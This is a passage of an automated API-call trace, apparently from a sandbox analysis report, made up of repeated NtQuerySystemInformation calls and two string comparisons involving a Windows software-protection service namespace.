[0233.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dec0, Length=0x50, ResultLength=0x0) [0233.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dec0, Length=0x50, ResultLength=0x0) [0233.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dec0, Length=0x50, ResultLength=0x0) [0233.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dec0, Length=0x50, ResultLength=0x0) [0233.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ddf0, Length=0x38, ResultLength=0x0) [0233.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc20, Length=0x28, ResultLength=0x0) [0233.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc20, Length=0x28, ResultLength=0x0) [0233.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc20, Length=0x28, ResultLength=0x0) [0233.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc90, Length=0x28, ResultLength=0x0) [0233.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ddf0, Length=0x38, ResultLength=0x0) [0233.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dd10, Length=0x28, ResultLength=0x0) [0233.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dd10, Length=0x28, ResultLength=0x0) [0233.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ddf0, Length=0x38, ResultLength=0x0) [0233.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc70, Length=0x20, ResultLength=0x0) [0233.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dbf0, Length=0x20, ResultLength=0x0) [0233.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dbf0, Length=0x20, ResultLength=0x0) [0233.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dbf0, Length=0x20, ResultLength=0x0) [0233.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ddf0, Length=0x38, ResultLength=0x0) [0233.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc70, Length=0x20, ResultLength=0x0) [0233.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc00, Length=0x20, ResultLength=0x0) [0233.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc00, Length=0x20, ResultLength=0x0) [0233.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dfd0, Length=0x50, ResultLength=0x0) [0233.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dfd0, Length=0x50, ResultLength=0x0) [0233.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dfd0, Length=0x50, ResultLength=0x0) [0233.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dec0, Length=0x50, ResultLength=0x0) [0233.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dec0, Length=0x50, ResultLength=0x0) [0233.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dec0, Length=0x50, ResultLength=0x0) [0233.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dec0, Length=0x50, ResultLength=0x0) [0233.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ddf0, Length=0x38, ResultLength=0x0) [0233.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc20, Length=0x28, ResultLength=0x0) [0233.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc20, Length=0x28, ResultLength=0x0) [0233.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc20, Length=0x28, ResultLength=0x0) [0233.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc90, Length=0x28, ResultLength=0x0) [0233.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ddf0, Length=0x38, ResultLength=0x0) [0233.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dd10, Length=0x28, ResultLength=0x0) [0233.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dd10, Length=0x28, ResultLength=0x0) [0233.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ddf0, Length=0x38, ResultLength=0x0) [0233.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc70, Length=0x20, ResultLength=0x0) [0233.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dbf0, Length=0x20, ResultLength=0x0) [0233.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dbf0, Length=0x20, ResultLength=0x0) [0233.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dbf0, Length=0x20, ResultLength=0x0) [0233.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ddf0, Length=0x38, ResultLength=0x0) [0233.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc70, Length=0x20, ResultLength=0x0) [0233.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc00, Length=0x20, ResultLength=0x0) [0233.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dc00, Length=0x20, ResultLength=0x0) [0233.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e080, Length=0x50, ResultLength=0x0) [0233.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e000, Length=0x28, ResultLength=0x0) [0233.277] _wcsicmp (_String1="SPPSVC\\0ff1ce15-a989-479d-af46-f275c6370663\\2cb19a15-bab2-4fcb-acee-4bde5be207a5", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0233.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e080, Length=0x50, ResultLength=0x0) [0233.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e080, Length=0x50, ResultLength=0x0) [0233.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e080, Length=0x50, ResultLength=0x0) [0233.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dfb0, Length=0x38, ResultLength=0x0) [0233.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dde0, Length=0x28, ResultLength=0x0) [0233.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dde0, Length=0x28, ResultLength=0x0) [0233.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dde0, Length=0x28, ResultLength=0x0) [0233.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7de50, Length=0x28, ResultLength=0x0) [0233.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dfb0, Length=0x38, ResultLength=0x0) [0233.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ded0, Length=0x28, ResultLength=0x0) [0233.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ded0, Length=0x28, ResultLength=0x0) [0233.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dfb0, Length=0x38, ResultLength=0x0) [0233.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7de30, Length=0x20, ResultLength=0x0) [0233.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ddb0, Length=0x20, ResultLength=0x0) [0233.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ddb0, Length=0x20, ResultLength=0x0) [0233.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ddb0, Length=0x20, ResultLength=0x0) [0233.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dfb0, Length=0x38, ResultLength=0x0) [0233.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7de30, Length=0x20, ResultLength=0x0) [0233.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ddc0, Length=0x20, ResultLength=0x0) [0233.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ddc0, Length=0x20, ResultLength=0x0) [0233.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e080, Length=0x50, ResultLength=0x0) [0233.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e000, Length=0x28, ResultLength=0x0) [0233.289] _wcsicmp (_String1="SPPSVC\\0ff1ce15-a989-479d-af46-f275c6370663\\2cb19a15-bab2-4fcb-acee-4bde5be207a5", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0233.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e080, Length=0x50, ResultLength=0x0) [0233.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e080, Length=0x50, ResultLength=0x0) [0233.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e080, Length=0x50, ResultLength=0x0) [0233.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dfb0, Length=0x38, ResultLength=0x0) [0233.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dde0, Length=0x28, ResultLength=0x0) [0233.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dde0, Length=0x28, ResultLength=0x0) [0233.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dde0, Length=0x28, ResultLength=0x0) [0233.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7de50, Length=0x28, ResultLength=0x0) [0233.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dfb0, Length=0x38, ResultLength=0x0) [0233.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ded0, Length=0x28, ResultLength=0x0) [0233.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ded0, Length=0x28, ResultLength=0x0) [0233.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dfb0, Length=0x38, ResultLength=0x0) [0233.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7de30, Length=0x20, ResultLength=0x0) [0233.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ddb0, Length=0x20, ResultLength=0x0) [0233.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ddb0, Length=0x20, ResultLength=0x0) [0233.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ddb0, Length=0x20, ResultLength=0x0) [0233.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dfb0, Length=0x38, ResultLength=0x0) [0233.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7de30, Length=0x20, ResultLength=0x0) [0233.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ddc0, Length=0x20, ResultLength=0x0) [0233.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ddc0, 